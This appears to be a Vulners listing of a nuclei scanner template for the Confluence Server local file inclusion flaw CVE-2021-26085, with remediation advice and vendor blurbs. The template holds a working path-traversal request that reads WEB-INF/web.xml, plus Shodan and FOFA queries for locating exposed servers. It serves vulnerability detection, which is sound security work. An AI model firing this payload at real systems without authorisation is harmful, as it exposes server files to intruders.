Lucene search
K

Atlassian Confluence Server - Local File Inclusion

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 71 Views

Atlassian Confluence Server - Local File Inclusion vulnerability allows unauthorized access to restricted resources via LFI in /s/ endpoint. Apply Atlassian's security patches

Related
Refs
Code
id: CVE-2021-26085

info:
  name: Atlassian Confluence Server - Local File Inclusion
  author: princechaddha
  severity: medium
  description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.
  impact: |
    An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches provided by Atlassian to fix the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
    - https://jira.atlassian.com/browse/CONFSERVER-67893
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26085
    - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
    - https://github.com/e-hakson/OSCP
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-26085
    cwe-id: CWE-425
    epss-score: 0.99937
    epss-percentile: 0.99968
    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: confluence_data_center
    shodan-query:
      - http.component:"Atlassian Confluence"
      - http.component:"atlassian confluence"
    fofa-query: app="atlassian-confluence"
  tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <display-name>Confluence</display-name>
          - com.atlassian.confluence.setup.ConfluenceAppConfig
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009a0bdfe3dd961cc451680ea5a8597788423feb0bac7771063e4856b5447802f20220767b04d582c148770fd36abe4e6f8a688711966cb4f985546b2eac79c30cfb1c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 25
CVSS 3.15.3
EPSS0.99937
SSVC
71